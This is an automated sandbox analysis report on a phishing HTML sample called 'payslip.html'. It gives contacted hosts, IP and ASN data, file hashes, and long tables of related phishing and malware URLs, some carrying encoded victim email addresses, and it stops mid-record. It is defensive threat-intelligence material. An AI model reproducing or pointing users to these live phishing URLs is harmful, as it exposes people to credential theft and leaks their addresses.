                          https://www.grandehotelbraganca.com.br/host22/7ffe563.phpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0false
                            high
                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.cssfalse
                              high
                              file:///C:/Users/user/Desktop/payslip.htmlfalse
                                low
                                https://www.grandehotelbraganca.com.br/host22/admin/js/mf.php?id=94Egx7Upbfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.102&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                  high
                                  https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                    high
                                    https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://fontawesome.iochromecache_254.1.dr, chromecache_251.1.drfalse
                                          high
                                          http://fontawesome.io/licensechromecache_254.1.dr, chromecache_251.1.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.17.24.14
                                            cdnjs.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            184.171.250.122
                                            grandehotelbraganca.com.brUnited States
                                            33182DIMENOCUSfalse
                                            152.199.4.73
                                            cs1025.wpc.upsiloncdn.netUnited States
                                            15133EDGECASTUSfalse
                                            142.250.68.45
                                            accounts.google.comUnited States
                                            15169GOOGLEUSfalse
                                            13.107.213.69
                                            part-0041.t-0009.t-msedge.netUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            142.250.217.132
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            69.16.175.10
                                            code.jquery.comUnited States
                                            20446HIGHWINDS3USfalse
                                            142.250.72.142
                                            clients.l.google.comUnited States
                                            15169GOOGLEUSfalse
                                            IP
                                            192.168.2.1
                                            Joe Sandbox Version:38.0.0 Beryl
                                            Analysis ID:1303950
                                            Start date and time:2023-09-06 01:44:11 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 5m 22s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                            Number of analysed new started processes analysed:27
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample file name:payslip.html
                                            Detection:MAL
                                            Classification:mal80.phis.winHTML@30/13@7/10
                                            EGA Information:Failed
                                            HDC Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .html
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.188.227, 34.104.35.123, 172.217.12.131, 142.250.72.131
                                            • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, tse1.mm.bing.net, clientservices.googleapis.com, g.bing.com, aadcdn.msauth.net, arc.msn.com, firstparty-azurefd-prod.trafficmanager.net, ris.api.iris.microsoft.com, edgedl.me.gvt1.com, login.live.com, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, displaycatalog.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: payslip.html
                                            No simulations
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.17.24.14http://vtaurl.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                            http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                            184.171.250.122Linux_amd64Get hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              code.jquery.com12345.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              https://vizagwaterpark.in/wp-admin/upgrade/Astranis/bm9ib2R5QG5vYm9keS5vcmclCg==Get hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              Aspenleafenergy_MSG9TZc599CpE.htmGet hashmaliciousUnknownBrowse
                                              • 69.16.175.10
                                              vm-2023090500000000000000XXXX.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              http://www.ecorfan.orgGet hashmaliciousUnknownBrowse
                                              • 69.16.175.42
                                              Remitpay-TMK005133.htmlGet hashmaliciousUnknownBrowse
                                              • 69.16.175.42
                                              https://pub-4d97631662434b85845e7be2b52b6e61.r2.dev/glennhoulier2023.html#bcagle@wecon.com&c=E,1,-nqvAvm6VhLOMj6i8nfSYcYIuFMHExxuUgyQmIXh2GgtooGBQPdOi6RopYuKhwThxMaln4HSVitLFfbfoUamFio3tjpCdGmfNCqKh578trCoxwc,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              Untitled attachment 00002.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              #Ud83d#UdccePaystub_Statements-DOCS.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              https://indd.adobe.com/view/cebdde4a-b91c-4b0b-8bf8-5ff7a746d454Get hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              https://ipfs.io/ipfs/bafybeiew3s6faevcjmwgaqqpscdtqeo3vgw7ctlgimndumnzimfasydx3q/08-09-54gy5y-00-vkbr-0t-jrhf.html#quarterlyreviews.biill@blah.comGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              https://ipfs.io/ipfs/bafybeiew3s6faevcjmwgaqqpscdtqeo3vgw7ctlgimndumnzimfasydx3q/08-09-54gy5y-00-vkbr-0t-jrhf.html#quarterlyreviews.bill@blah.comGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              ##Credit Note WAL-373829.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              ChemgenesDOCS.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.10
                                              South-wales Salary Approval.htmlGet hashmaliciousUnknownBrowse
                                              • 69.16.175.42
                                              Merchant_Settlement_Payment_Deposited.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 69.16.175.42
                                              http://pl.8545.topGet hashmaliciousUnknownBrowse
                                              • 69.16.175.10
                                              =UTF-8B5TlRTX2VUYXhJbnZvaWNlLmh0bWw=.htmlGet hashmaliciousUnknownBrowse
                                              • 69.16.175.42
                                              https://minimumsol.com/0/0/0/9e983bb8d13880312b9ce24ac5a24a47/UPS555_043i4pe/_j1%7C3pkhe%7Chi1fn%7Co0464f3563004e3d_1nm4%7C140lbju%7C94543%7C01eerhi1fn%7CAGet hashmaliciousGRQ Scam, PhisherBrowse
                                              • 69.16.175.10
                                              http://facilitateric.org.uk/9rqup7krhrjdt2a.php/ZXZtZ2dv/cGhiag==/b2dr/?l=MzI9MW8wNDY0ZjM1NjMwMDRlM2RfMW5tNC4za3R0N3M0bC5BMDFlZXJoaTFmbjIweTc3eDJfajEyMTQ2LmhpMWZu&f=dHJsYWw=d21lcHlydXU=M3BraGUxNDBsYmp1Ad18rRGet hashmaliciousGRQ Scam, PhisherBrowse
                                              • 69.16.175.10
                                              cdnjs.cloudflare.comNew voicemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p#cGF1bG5ld3NhbUBwYXllLm5ldA==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p&#c2hvaWNoaS5va2F3YUB0YWZlcWxkLmVkdS5hdQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p&#c2hvaWNoaS5va2F3YUB0YWZlcWxkLmVkdS5hdQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://vizagwaterpark.in/wp-admin/upgrade/Astranis/bm9ib2R5QG5vYm9keS5vcmclCg==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              Aspenleafenergy_MSG9TZc599CpE.htmGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://beautytipstop.com/alkaliness/evasss/lasenasss/asdf/YWxicmVjaHRhQHNjaG5laWRlci5jb20=Get hashmaliciousPhisher, ReCaptcha PhishBrowse
                                              • 104.17.24.14
                                              Ennead Project Proposal.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              vm-2023090500000000000000XXXX.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              http://www.ecorfan.orgGet hashmaliciousUnknownBrowse
                                              • 104.17.24.14
                                              Remitpay-TMK005133.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://pub-4d97631662434b85845e7be2b52b6e61.r2.dev/glennhoulier2023.html#bcagle@wecon.com&c=E,1,-nqvAvm6VhLOMj6i8nfSYcYIuFMHExxuUgyQmIXh2GgtooGBQPdOi6RopYuKhwThxMaln4HSVitLFfbfoUamFio3tjpCdGmfNCqKh578trCoxwc,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://d3g0kb6u2d45cj.cloudfront.net/werrx01/?phone=+1-888-682-6775Get hashmaliciousTechSupportScamBrowse
                                              • 104.17.24.14
                                              https://d3g0kb6u2d45cj.cloudfront.net/werrx01/?phone=+1-888-682-6775Get hashmaliciousTechSupportScamBrowse
                                              • 104.17.24.14
                                              AmericanExpress_SecureMessage_Att.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://gayteam.club/17267-gangbangapalooza-2-blessed-xboy-15-man-gangbang.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.24.14
                                              https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiz96XqzJOBAxWklokEHfkADaIQFnoECA4QAQ&url=http%3A%2F%2Fshowlinkroom.me%2F2020%2F05%2F02%2FWindows-Via-C-C-note-4-2%2F&usg=AOvVaw1C7hbtEPwjTBiMGhaR1Q66&opi=89978449Get hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              #Ud83d#UdccePaystub_Statements-DOCS.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              https://e%C2%AD%C2%AD%C2%AD%C2%ADez%C2%AD%C2%AD%C2%AD%C2%ADee.c%C2%AD%C2%AD%C2%AD%C2%ADo%C2%AD%C2%AD%C2%AD%C2%ADm.s%C2%AD%C2%AD%C2%AD%C2%ADg/v20/#himpatientportal@noch.orgGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://nxejt.goldengrinder.topGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSNew voicemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p#cGF1bG5ld3NhbUBwYXllLm5ldA==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p&#c2hvaWNoaS5va2F3YUB0YWZlcWxkLmVkdS5hdQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.3.184
                                              http://www.baidu.com/link?url=j7aZ9QhlcfKnNYKMPMZAnqPVGLnehmCc4mxPO-r8eAavBiYsq5QAk53J7XAodB0p&#c2hvaWNoaS5va2F3YUB0YWZlcWxkLmVkdS5hdQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://padlet.com/scan461/rfq-f1le-2uejms4x0xv95hj8Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 104.16.57.101
                                              https://vizagwaterpark.in/wp-admin/upgrade/Astranis/bm9ib2R5QG5vYm9keS5vcmclCg==Get hashmaliciousHTMLPhisherBrowse
                                              • 104.21.24.132
                                              https://g6zjt2b6tigqpsy28olk.8kih.ru/bj09m/Get hashmaliciousUnknownBrowse
                                              • 104.18.16.182
                                              RemitDetail.xlsxGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 104.21.59.10
                                              Aspenleafenergy_MSG9TZc599CpE.htmGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://beautytipstop.com/alkaliness/evasss/lasenasss/asdf/YWxicmVjaHRhQHNjaG5laWRlci5jb20=Get hashmaliciousPhisher, ReCaptcha PhishBrowse
                                              • 104.17.24.14
                                              Ennead Project Proposal.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              https://www.notion.so/CONFIDENTIAL-DOCUMENT-9edcfb2e28844c1f82db34f9d863e78b?pvs=4Get hashmaliciousUnknownBrowse
                                              • 104.16.123.96
                                              https://www.coimmune.com/Get hashmaliciousUnknownBrowse
                                              • 172.67.146.74
                                              23_39 PM.emlGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              vm-2023090500000000000000XXXX.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.24.14
                                              https://app.getresponse.com/click.html?x=a62b&lc=hJsrlr&mc=Jk&s=BKlfjHI&u=Cn9qH&z=EGFGt6N&#YWNjb3VudGluZ0BiaW9sZWdlbmQuY29tGet hashmaliciousUnknownBrowse
                                              • 104.17.2.184
                                              http://www.ecorfan.orgGet hashmaliciousUnknownBrowse
                                              • 104.17.24.14
                                              https://mfa-dept.org/MdGhvbWFzLmJlY2tAZmxjdS5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.2.184
                                              Remitpay-TMK005133.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://auth0-ceossonline-eur.web.app/5342/?bWNvcm5ldHRhQHRlZ25hLmNvbQ==?v=5342537dw7/Get hashmaliciousUnknownBrowse
                                              • 104.16.57.101
                                              DIMENOCUSRemitpay-TMK005133.htmlGet hashmaliciousUnknownBrowse
                                              • 107.161.178.172
                                              SecuriteInfo.com.Trojan.PackedNET.2316.19151.11236.exeGet hashmaliciousAgentTeslaBrowse
                                              • 138.128.180.60
                                              Consiglio_di_Pagamento_Intesa_Sanpaolo_Pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                                              • 107.161.181.250
                                              DUGEn9I0cO.elfGet hashmaliciousMiraiBrowse
                                              • 184.171.252.96
                                              #U0391#U0399#U03a4#U0397#U03a3#U0397_20230822.xlsGet hashmaliciousAgentTeslaBrowse
                                              • 162.221.189.194
                                              UGTH1QOGxQ.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.221.189.194
                                              MsMpEng.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.221.189.194
                                              #U03a0#U03a1#U039f#U03a3#U03a6#U039f#U03a1#U0391_202308-10_22.08.2023.xlsGet hashmaliciousAgentTeslaBrowse
                                              • 162.221.189.194
                                              rffA4q7W845OLroa.exeGet hashmaliciousFormBookBrowse
                                              • 198.136.59.220
                                              oferta_202308-10_21.08.2023.xlsGet hashmaliciousAgentTeslaBrowse
                                              • 162.221.189.194
                                              #U652f#U4ed8#U5b9d_-_#U652f#U4ed8#U5b9d_#U4ed8#U6b3e#U526f#U672c_Pdf.exeGet hashmaliciousRemcosBrowse
                                              • 107.161.181.250
                                              https://yai.cl/printGet hashmaliciousHTMLPhisherBrowse
                                              • 138.128.170.234
                                              SecuriteInfo.com.HEUR.Trojan.Win32.Generic.31599.22001.dllGet hashmaliciousUnknownBrowse
                                              • 98.142.108.146
                                              https://sellers.instatfootball.tv/4-010110111-0-0-001010110-ed6874?u=https://greatlakespeace.org/sharefile/%5BEMail_LocalPart%5D/rpearl@kforce.com&d=DwMFAwGet hashmaliciousUnknownBrowse
                                              • 107.190.129.90
                                              https://ferrecity.com.pe/filedirectory/accesssigneddocument/index.php?userid=YWxiZXJ0b0Bhc3RyYW5pcy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                              • 67.23.232.82
                                              rR2ngLLzr9.elfGet hashmaliciousMiraiBrowse
                                              • 198.136.58.107
                                              SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
                                              • 187.45.187.42
                                              SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
                                              • 187.45.187.42
                                              https://dentvida.com.br/Auto%20file/8475657rgdgdgvet46473t362gddvd3t.php#cookie.pillay2@momentum.co.zaGet hashmaliciousHTMLPhisherBrowse
                                              • 67.23.238.59
                                              https://caffiosul.com.br/caffiosul/caffiosulssl/Tafeqld/YWxhbi5jaGFwbWFuQHRhZmVxbGQuZWR1LmF1Get hashmaliciousHTMLPhisherBrowse
                                              • 177.234.145.146
                                              No context
                                              No context
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                              Category:downloaded
                                              Size (bytes):1173
                                              Entropy (8bit):7.811199816788843
                                              Encrypted:false
                                              SSDEEP:24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
                                              MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                              SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                              SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                              SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
                                              Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                              Category:downloaded
                                              Size (bytes):77160
                                              Entropy (8bit):7.996509451516447
                                              Encrypted:true
                                              SSDEEP:1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
                                              MD5:AF7AE505A9EED503F8B8E6982036873E
                                              SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                              SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                              SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
                                              Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                                              Category:downloaded
                                              Size (bytes):37414
                                              Entropy (8bit):4.82325822639402
                                              Encrypted:false
                                              SSDEEP:768:mmMtI+A4CSIDqvnI+YTBrFPvVrJjhiRAiiEL:mXtI+A4GDUI+Y9rpVljhiIEL
                                              MD5:C495654869785BC3DF60216616814AD1
                                              SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                                              SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                                              SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                                              Malicious:false
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
                                              Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                              Category:downloaded
                                              Size (bytes):2407
                                              Entropy (8bit):7.900400471609788
                                              Encrypted:false
                                              SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                              Malicious:false
                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], baseline, precision 8, 260x60, components 3
                                              Category:dropped
                                              Size (bytes):7975
                                              Entropy (8bit):7.8246397739807945
                                              Encrypted:false
                                              SSDEEP:192:tBGet1scZZVEcJm5AyptRyraRE2DSunrL:tBGe/ZecJaptRM2jL
                                              MD5:FF4E954D8F85CCF9EEE6447EE718D9C1
                                              SHA1:84919E1CD5599DEAC884A6B38E1B5443C263593A
                                              SHA-256:FE3839FE5D391C32CE9C36ECD5489D926BD7D70A4ACBFED69B5CE4C273299C09
                                              SHA-512:5E5D9B55273FD7362E7CF64334DECE7C3685291D3B5B2E914068BA9FF8A85F672F215099B79535CD62B8E179D1129DC76373584ABC0EFD02F00EAA08B42249F2
                                              Malicious:false
                                              Preview:......JFIF.............fExif..MM.*.............................V............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...'`.@9..~M...F~......<y.+L..n............g.P' .{..c.,...]........z.....e{.Zh.T.q.79#...F}..].3....f.=.........R....Ux..M.......i.'.....|I..{....F....._)...Q....W>..|u........'N7R...kyTF.......^.#.*T=.#..Gu\D.K.8...~.3.j1..q..~....M.........5...O.K.(r.$....W
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (30837)
                                              Category:downloaded
                                              Size (bytes):31000
                                              Entropy (8bit):4.746143404849733
                                              Encrypted:false
                                              SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                                              MD5:269550530CC127B6AA5A35925A7DE6CE
                                              SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                              SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
